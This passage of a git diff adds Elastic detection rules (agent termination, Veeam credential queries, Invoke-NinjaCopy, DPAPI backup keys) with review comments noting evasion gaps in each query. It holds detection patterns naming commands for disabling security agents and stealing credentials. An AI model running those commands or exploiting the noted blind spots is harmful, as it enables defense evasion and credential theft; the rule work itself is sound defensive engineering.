"Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_106.json b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_106.json new file mode 100644 index 00000000000..60b365a20b4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_106.json 
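Review bot: The verb check `process.args in ("delete", "resize")` in the query is, to my reading of EQL, a case-sensitive comparison, while vssadmin accepts `Delete Shadows` or `DELETE SHADOWS` just as readily, so a re-cased command line slips past even though the `shadows*` term next to it uses the case-insensitive `:` operator. Switching to `process.args in~ ("delete", "resize")` (or `process.args : ("delete", "resize")`) keeps both terms case-insensitive. Separately, the "Related rules" list in the note cites this rule's own id (b5ea4bfe-…) as a related rule, which looks like a carry-over from the sibling PowerShell rule and should be dropped.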
@@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the Elastic endpoint agent has stopped and is no longer running on the host. Adversaries may attempt to disable security monitoring tools in an attempt to evade detection or prevention capabilities during an intrusion. This may also indicate an issue with the agent itself and should be addressed to ensure defensive measures are back in a stable state.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Elastic Agent Service Terminated", + "query": "process where\n/* net, sc or wmic stopping or deleting Elastic Agent on Windows */\n(event.type == \"start\" and\n process.name : (\"net.exe\", \"sc.exe\", \"wmic.exe\",\"powershell.exe\",\"taskkill.exe\",\"PsKill.exe\",\"ProcessHacker.exe\") and\n process.args : (\"stopservice\",\"uninstall\", \"stop\", \"disabled\",\"Stop-Process\",\"terminate\",\"suspend\") and\n process.args : (\"elasticendpoint\", \"Elastic Agent\",\"elastic-agent\",\"elastic-endpoint\"))\nor\n/* service or systemctl used to stop Elastic Agent on Linux */\n(event.type == \"end\" and\n (process.name : (\"systemctl\", \"service\") and\n process.args : \"elastic-agent\" and\n process.args : \"stop\")\n or\n /* pkill , killall used to stop Elastic Agent on Linux */\n ( event.type == \"end\" and process.name : (\"pkill\", \"killall\") and process.args: \"elastic-agent\")\n or\n /* Unload Elastic Agent extension on MacOS */\n (process.name : \"kextunload\" and\n process.args : \"com.apple.iokit.EndpointSecurity\" and\n event.action : \"end\"))\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, 
+ "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b627cd12-dac4-11ec-9582-f661ea17fbcd", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: Windows", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "b627cd12-dac4-11ec-9582-f661ea17fbcd_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_108.json b/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_108.json new file mode 100644 index 00000000000..de88753c3fd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_108.json 
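Review bot: The Windows branch lists `taskkill.exe` and `PsKill.exe` in `process.name`, but the verb filter (`stopservice`, `uninstall`, `stop`, `disabled`, `Stop-Process`, `terminate`, `suspend`) contains nothing those tools put on their command line, and the target filter uses exact, non-wildcard values, so `taskkill /F /IM elastic-agent.exe` matches neither a verb nor the `elastic-agent` target and never fires. Consider wildcard targets such as `process.args : ("*elastic-agent*", "*elastic-endpoint*", "*elasticendpoint*")` and giving the kill tools their own clause keyed only on the target. `net1.exe`, which `net.exe` delegates to and which is commonly invoked directly to dodge `net.exe`-based rules, is also absent from the name list.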
@@ -0,0 +1,159 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the built-in Windows script interpreters (cscript.exe or wscript.exe) being used to execute a process via Windows Management Instrumentation (WMI). This may be indicative of malicious activity.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Script Interpreter Executing Process via WMI", + "query": "sequence by host.id with maxspan = 5s\n [any where host.os.type == \"windows\" and \n (event.category : (\"library\", \"driver\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (?dll.name : \"wmiutils.dll\" or file.name : \"wmiutils.dll\") and process.name : (\"wscript.exe\", \"cscript.exe\")]\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"wmiprvse.exe\" and\n user.domain != \"NT AUTHORITY\" and\n (process.pe.original_file_name :\n (\n \"cscript.exe\",\n \"wscript.exe\",\n \"PowerShell.EXE\",\n \"Cmd.Exe\",\n \"MSHTA.EXE\",\n \"RUNDLL32.EXE\",\n \"REGSVR32.EXE\",\n \"MSBuild.exe\",\n \"InstallUtil.exe\",\n \"RegAsm.exe\",\n \"RegSvcs.exe\",\n \"msxsl.exe\",\n \"CONTROL.EXE\",\n \"EXPLORER.EXE\",\n \"Microsoft.Workflow.Compiler.exe\",\n \"msiexec.exe\"\n ) or\n process.executable : (\"C:\\\\Users\\\\*.exe\", \"C:\\\\ProgramData\\\\*.exe\")\n )\n ]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b64b183e-1a76-422d-9179-7b389513e74d", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + }, + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "type": "eql", + "version": 108 + }, + "id": 
"b64b183e-1a76-422d-9179-7b389513e74d_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b661f86d-1c23-4ce7-a59e-2edbdba28247_1.json b/packages/security_detection_engine/kibana/security_rule/b661f86d-1c23-4ce7-a59e-2edbdba28247_1.json new file mode 100644 index 00000000000..3d69f9818c7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b661f86d-1c23-4ce7-a59e-2edbdba28247_1.json 
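Review bot: Unlike the other EQL rules in this diff, this rule sets no `timestamp_override` and carries no `setup` text, so with `from: now-9m` events that arrive late (an endpoint that was offline, or a lagging Sysmon/winlogbeat pipeline) fall outside the lookback and are never evaluated. If leaving the override off is deliberate because this is a `sequence` query, a one-line `setup` entry saying so would stop the next maintainer from "fixing" it; otherwise adding `"timestamp_override": "event.ingested"` brings it in line with the sibling rules.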
@@ -0,0 +1,125 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies commands that can access and decrypt Veeam credentials stored in MSSQL databases. Attackers can use Veeam Credentials to target backups as part of destructive operations such as Ransomware attacks.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Veeam Credential Access Command", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n (process.name : \"sqlcmd.exe\" or process.pe.original_file_name : \"sqlcmd.exe\") or\n process.args : (\"Invoke-Sqlcmd\", \"Invoke-SqlExecute\", \"Invoke-DbaQuery\", \"Invoke-SqlQuery\")\n ) and\n process.args : \"*[VeeamBackup].[dbo].[Credentials]*\"\n", + "references": [ + "https://thedfirreport.com/2021/12/13/diavol-ransomware/" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b661f86d-1c23-4ce7-a59e-2edbdba28247", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential 
Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "b661f86d-1c23-4ce7-a59e-2edbdba28247_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b7c05aaf-78c2-4558-b069-87fa25973489_2.json b/packages/security_detection_engine/kibana/security_rule/b7c05aaf-78c2-4558-b069-87fa25973489_2.json new file mode 100644 index 00000000000..9220e6802f1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b7c05aaf-78c2-4558-b069-87fa25973489_2.json 
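Review bot: The only content match is `process.args : "*[VeeamBackup].[dbo].[Credentials]*"`, which requires the bracketed three-part name exactly as it appears in the referenced DFIR write-up; `SELECT ... FROM VeeamBackup.dbo.Credentials`, `USE VeeamBackup` followed by `FROM dbo.Credentials`, or a query handed over via `sqlcmd -i creds.sql` produces no match. A looser pattern such as `process.args : "*VeeamBackup*Credentials*"` covers the unbracketed forms at little false-positive cost given the sqlcmd/Invoke-Sqlcmd gate. The script-file case cannot be seen from process arguments at all and is worth stating as a known gap in a `note` so analysts do not treat a clean result as conclusive.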
@@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects potential buffer overflow attacks by querying the \"Segfault Detected\" pre-built rule signal index, through a threshold rule, with a minimum number of 100 segfault alerts in a short timespan. A large amount of segfaults in a short time interval could indicate application exploitation attempts.", + "from": "now-9m", + "index": [ + ".alerts-security.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Buffer Overflow Attack Detected", + "query": "kibana.alert.rule.rule_id:5c81fc9d-1eae-437f-ba07-268472967013 and event.kind:signal\n", + "required_fields": [ + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + }, + { + "ecs": false, + "name": "kibana.alert.rule.rule_id", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "b7c05aaf-78c2-4558-b069-87fa25973489", + "setup": "## Setup\n\n\nThis rule leverages alert data from other prebuilt detection rules to function correctly. 
\n\n### Dependent Elastic Detection Rule Enablement\nAs a higher-order rule (based on other detections), this rule also requires the following prerequisite Elastic detection rule to be installed and enabled:\n- Segfault Detected (5c81fc9d-1eae-437f-ba07-268472967013)\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Initial Access", + "Use Case: Vulnerability", + "Rule Type: Higher-Order Rule" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + } + ], + "threshold": { + "field": [ + "event.kind", + "host.id" + ], + "value": 100 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 2 + }, + "id": "b7c05aaf-78c2-4558-b069-87fa25973489_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_3.json b/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_3.json new file mode 100644 index 00000000000..f6794a3d661 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_3.json 
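Review bot: The threshold groups on `event.kind` as well as `host.id`, but the query already pins `event.kind:signal`, so that field yields a single constant bucket and only `host.id` actually partitions the count; `"field": ["host.id"]` says what is meant. `host.id` is the field the threshold depends on yet it is missing from `required_fields`, which lists only `event.kind` and `kibana.alert.rule.rule_id`. The description's "short timespan" is concretely the `now-9m` lookback; spelling that out in the `setup` text helps whoever tunes the 100-alert value.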
@@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Enrich process events with uname and other command lines that imply Linux system information discovery.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Linux System Information Discovery", + "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and (\n process.name: \"uname\" or (\n process.name: (\"cat\", \"more\", \"less\") and process.args: (\"*issue*\", \"*version*\", \"*profile*\", \"*services*\", \"*cpuinfo*\")\n )\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "b81bd314-db5b-4d97-82e8-88e3e5fc9de5", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": 
"b81bd314-db5b-4d97-82e8-88e3e5fc9de5_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_5.json b/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_5.json new file mode 100644 index 00000000000..c5450492628 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_5.json 
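Review bot: The query has no `host.os.type == "linux"` constraint even though the rule is tagged `OS: Linux`, and the `logs-endpoint.events.*` and `endgame-*` patterns carry macOS process events where `uname` and `cat /etc/profile` are just as common; the sibling rules in this diff guard with `host.os.type`. Adding `host.os.type == "linux" and` at the start of the `process where` clause scopes it as the tags promise. The `"*profile*"` argument pattern will also match `cat ~/.bash_profile`, which is worth a word in a `note` since this BBR rule is meant to enrich rather than alert.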
@@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects PowerShell scripts that contain the default exported functions used on Invoke-NinjaCopy. Attackers can use Invoke-NinjaCopy to read SYSTEM files that are normally locked, such as the NTDS.dit file or registry hives.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Invoke-NinjaCopy script", + "note": "## Triage and analysis\n\n### Investigating PowerShell Invoke-NinjaCopy script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making it available for use in various environments, creating an attractive way for attackers to execute code.\n\nInvoke-NinjaCopy is a PowerShell script capable of reading SYSTEM files that were normally locked, such as `NTDS.dit` or sensitive registry locations. It does so by using the direct volume access technique, which enables attackers to bypass access control mechanisms and file system monitoring by reading the raw data directly from the disk and extracting the file by parsing the file system structures.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Determine whether the script stores the captured data locally.\n- Check if the imported function was executed and which file it targeted.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"StealthReadFile\" or\n \"StealthReadFileAddr\" or\n \"StealthCloseFileDelegate\" or\n \"StealthOpenFile\" or\n \"StealthCloseFile\" or\n \"StealthReadFile\" or\n \"Invoke-NinjaCopy\"\n )\n and not user.id : \"S-1-5-18\"\n and not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\" and \"PowerSploitIndicators\"\n )\n", + "references": [ + "https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/collection/Invoke-NinjaCopy.ps1" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b8386923-b02c-4b94-986a-d223d9b01f88", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + 
"subtechnique": [ + { + "id": "T1003.002", + "name": "Security Account Manager", + "reference": "https://attack.mitre.org/techniques/T1003/002/" + }, + { + "id": "T1003.003", + "name": "NTDS", + "reference": "https://attack.mitre.org/techniques/T1003/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1006", + "name": "Direct Volume Access", + "reference": "https://attack.mitre.org/techniques/T1006/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 5 + }, + "id": "b8386923-b02c-4b94-986a-d223d9b01f88_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_107.json b/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_107.json new file mode 100644 index 00000000000..d5ee8e4032a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_107.json 
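Review bot: `"StealthReadFile"` appears twice in the `powershell.file.script_block_text` term list, a harmless but sloppy duplicate. More importantly, `and not user.id : "S-1-5-18"` exempts anything running as SYSTEM, and raw-volume reads of `NTDS.dit` or the SAM/SECURITY hives need exactly that level of privilege, so an operator who lands the script through PsExec `-s`, a service or a scheduled task is not covered. If the exclusion exists to silence management tooling, a false-positive entry in the `note` explaining that trade-off would help, and a narrower exclusion on that tooling's `process.executable` would be safer than a blanket SYSTEM carve-out.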
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of Domain Backup private keys. Adversaries may extract the Data Protection API (DPAPI) domain backup key from a Domain Controller (DC) to be able to decrypt any domain user master key file.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Creation or Modification of Domain Backup DPAPI private key", + "note": "## Triage and analysis\n\nDomain DPAPI Backup keys are stored on domain controllers and can be dumped remotely with tools such as Mimikatz. The resulting .pvk private key can be used to decrypt ANY domain user masterkeys, which then can be used to decrypt any secrets protected by those keys.\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and file.name : (\"ntds_capi_*.pfx\", \"ntds_capi_*.pvk\")\n", + "references": [ + "https://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/", + "https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "b83a7e96-2eb3-4edf-8346-427b6858d3bd", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest 
pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/", + "subtechnique": [ + { + "id": "T1552.004", + "name": "Private Keys", + "reference": "https://attack.mitre.org/techniques/T1552/004/" + } + ] + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "b83a7e96-2eb3-4edf-8346-427b6858d3bd_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_108.json b/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_108.json new file mode 100644 index 00000000000..8ee1f6912e2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_108.json 
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of Domain Backup private keys. Adversaries may extract the Data Protection API (DPAPI) domain backup key from a Domain Controller (DC) to be able to decrypt any domain user master key file.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Creation or Modification of Domain Backup DPAPI private key", + "note": "## Triage and analysis\n\nDomain DPAPI Backup keys are stored on domain controllers and can be dumped remotely with tools such as Mimikatz. The resulting .pvk private key can be used to decrypt ANY domain user masterkeys, which then can be used to decrypt any secrets protected by those keys.\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and file.name : (\"ntds_capi_*.pfx\", \"ntds_capi_*.pvk\")\n", + "references": [ + "https://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/", + "https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": 